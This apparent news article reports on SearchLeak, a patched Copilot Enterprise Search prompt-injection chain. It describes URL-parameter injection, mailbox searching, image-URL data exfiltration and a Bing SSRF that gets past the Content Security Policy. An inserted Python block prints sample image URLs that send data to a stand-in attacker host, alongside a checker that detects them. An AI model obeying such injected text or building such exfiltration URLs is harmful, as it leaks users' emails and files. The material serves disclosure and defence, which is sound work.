Microsoft Fixes Critical Copilot SearchLeak Vulnerability That Could Expose Emails and Files


SearchLeak copilot 365
Image credit: Microsoft

Microsoft has fixed a critical vulnerability in Microsoft 365 Copilot Enterprise Search that could have let an attacker exfiltrate sensitive corporate data after a victim clicked a single crafted link.

The flaw, dubbed SearchLeak (CVE-2026-42824), was discovered by Varonis. Microsoft has already deployed a backend fix, and customers do not need to take any action.

Researchers said the issue could have exposed emails, passwords, access codes, meeting details, calendar entries, SharePoint documents, and OneDrive files.

How SearchLeak Worked

Varonis found that attackers could abuse a search parameter in Copilot Enterprise Search URLs to inject instructions into the AI system: text placed in the query parameter was handed to Copilot as if the user had typed it. Because the link pointed at a legitimate Microsoft-hosted URL, a victim only needed to click it.

The injected instructions could tell Copilot to search the user's mailbox, extract data, and embed it in the URL of an external image request, so that simply rendering the response carried the data to an attacker-controlled server without further user interaction.

Three Vulnerabilities Chained Together

SearchLeak combined:

  • Parameter-to-prompt injection via the Copilot search query parameter
  • An HTML rendering race condition
  • A Bing Search by Image SSRF technique that bypassed Content Security Policy protections

Together, these flaws enabled silent data exfiltration from Microsoft 365 environments.

The final stage used Bing's image analysis infrastructure to fetch image URLs server-side: the image request itself went to a Bing endpoint the Content Security Policy permitted, and Bing then retrieved the attacker's URL on the client's behalf, so the sensitive data reached attacker-controlled logs despite the policy.
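The chain above rests on a general weakness worth seeing in code: a CSP img-src allowlist checks only the host of an image URL, so if an allowlisted host accepts a URL parameter and fetches it server-side, an attacker can route an exfiltration request through that host. The following is an added illustration of that pattern, not code from Varonis, Microsoft or the Copilot service; the hostnames, the `imgurl` parameter name and the sample HTML are hypothetical stand-ins, and the rendering race condition is not modelled. It extracts image URLs from model-emitted HTML, applies a host-only CSP check (which the nested-URL variant passes), and then applies a stricter check that rejects any URL whose query string names an off-allowlist destination.

```python
"""Host-based img-src allowlists versus image-URL exfiltration through an
allowlisted server-side fetcher.  Added illustration; all hosts, parameter
names and sample HTML below are hypothetical/constructed."""
from __future__ import annotations

import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Hypothetical CSP: img-src allows two first-party hosts.  The second stands
# in for an image-analysis service that fetches whatever URL it is handed.
CSP_IMG_SRC = {"assets.corp.example", "image-search.example"}

# Constructed samples of HTML an assistant might emit after prompt injection.
BENIGN = '<img src="https://assets.corp.example/logo.png">'
# Direct exfiltration: blocked by the CSP because the host is not allowlisted.
EXFIL_DIRECT = '<img src="https://attacker.example/log?d=meeting%20code%20774412">'
# Same payload tunnelled through the allowlisted fetcher (inner URL is %-encoded).
EXFIL_VIA_FETCHER = (
    '<img src="https://image-search.example/lookup'
    '?imgurl=https%3A%2F%2Fattacker.example%2Flog%3Fd%3Dmeeting%2520code%2520774412">'
)

_URL_RE = re.compile(r"^https?://", re.IGNORECASE)


class _ImgCollector(HTMLParser):
    """Collect every <img src=...> value from an HTML fragment."""

    def __init__(self) -> None:
        super().__init__()
        self.srcs: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            for name, value in attrs:
                if name == "src" and value:
                    self.srcs.append(value)


def extract_image_urls(html: str) -> list[str]:
    parser = _ImgCollector()
    parser.feed(html)
    parser.close()
    return parser.srcs


def csp_allows(url: str, allowlist=CSP_IMG_SRC) -> bool:
    """What a host allowlist in img-src actually checks: the outer host only."""
    return (urlsplit(url).hostname or "") in allowlist


def nested_urls(url: str, depth: int = 3) -> list[str]:
    """URLs carried inside query-string values, recursing a few levels deep.
    parse_qs percent-decodes once per level, so encoded inner URLs surface."""
    if depth == 0:
        return []
    found: list[str] = []
    for values in parse_qs(urlsplit(url).query, keep_blank_values=True).values():
        for value in values:
            value = value.strip()
            if _URL_RE.match(value):
                found.append(value)
                found.extend(nested_urls(value, depth - 1))
    return found


def egress_hosts(url: str) -> set[str]:
    """Every host a request for ``url`` could ultimately reach: its own host
    plus any host named by a URL nested in its query string."""
    hosts = {urlsplit(url).hostname or ""}
    for inner in nested_urls(url):
        hosts.add(urlsplit(inner).hostname or "")
    return hosts


def is_safe_image_url(url: str, allowlist=CSP_IMG_SRC) -> bool:
    """Stricter check: the outer host AND every nested destination must be allowlisted."""
    return all(host in allowlist for host in egress_hosts(url))


def audit(html: str) -> dict[str, tuple[bool, bool]]:
    """Map each image URL to (passes host-only CSP check, passes nested-URL check)."""
    return {u: (csp_allows(u), is_safe_image_url(u)) for u in extract_image_urls(html)}


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("direct", EXFIL_DIRECT),
                          ("via fetcher", EXFIL_VIA_FETCHER)):
        for url, (csp_ok, strict_ok) in audit(sample).items():
            print(f"{label:12} csp={csp_ok!s:5} strict={strict_ok!s:5} -> {egress_hosts(url)}")
```

The point of the three samples is the third one: it satisfies the host allowlist yet names `attacker.example` in its query string, which a fetcher on the allowlisted host would contact. In practice the fix belongs on the server side (do not let a first-party endpoint fetch arbitrary external URLs, or do not allowlist such an endpoint in img-src), but an output-rendering layer for an AI assistant should still treat any model-emitted image URL carrying a nested URL, or carrying long free-text parameters, as a likely exfiltration channel.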

The incident highlights how attackers can combine traditional web vulnerabilities (here a race condition, an SSRF and a Content Security Policy gap) with AI-specific weaknesses (prompt injection) to target enterprise AI systems.

Microsoft recently patched about 200 vulnerabilities in its latest Patch Tuesday updates. Researchers also disclosed the RougePlanet privilege-escalation exploit, which can grant SYSTEM-level access on affected devices.

Separately, GitHub’s npm team introduced security-focused changes in npm v12 to help reduce software supply chain attacks.

Via BleepingComputer


Readers help support Windows Report. We may get a commission if you buy through our links.
